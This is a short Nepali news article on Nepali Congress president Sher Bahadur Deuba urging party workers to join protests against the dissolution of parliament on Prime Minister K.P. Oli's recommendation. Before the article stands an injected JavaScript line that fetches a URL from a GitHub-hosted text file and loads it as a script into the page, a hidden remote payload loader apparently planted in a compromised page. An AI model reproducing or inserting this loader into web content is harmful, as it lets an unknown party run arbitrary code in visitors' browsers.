;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
पुष ११,
काठमाडौं । नेपाली कांग्रेसका सभापति शेरबहादुर देउवाले पुस १३ को प्रदर्शनमा सहभागी हुन कार्याकर्तालाई अपिेल गरेका छन् ।
शनिबार एक अपिल जारी गर्दै प्रधानमन्त्री के.पी. शर्मा ओलीको सिफारिसमा प्रतिनिधिसभा विघटन गरिएको घटनाका विरुद्ध पुस १३ गते सोमबार कांग्रेसले गर्नलागेको १६५ निर्वाचन क्षेत्रको विरोध प्रदर्शनमा सहभागि हुन सबैमा अपील गरेका हुन् ।
कांग्रेस सभापतिले संसद विघटनकै दिन पार्टीका वर्तमान र पूर्व पदाधिकारीहरुको बैठक आयोजना गरेर बैठक मार्फत संसद विघटनलाई असंवैधानिक र अलोकतान्त्रिक ठहर गरिसकेको उल्लेख गरेका छन् ।
जारी अपिलमा केन्द्रीय कार्यसमितिको बैठकमा देउवा आफैले १३ गते प्रदर्शन गर्ने प्रस्ताव गरेर, केन्द्रीय कार्यसमितिको निर्णय पश्चात् अहिले हाम्रो सम्पूर्ण ध्यान प्रदर्शनमा केन्द्रित छ लेखिएको छ ।
फेसबुक प्रतिक्रियाहरु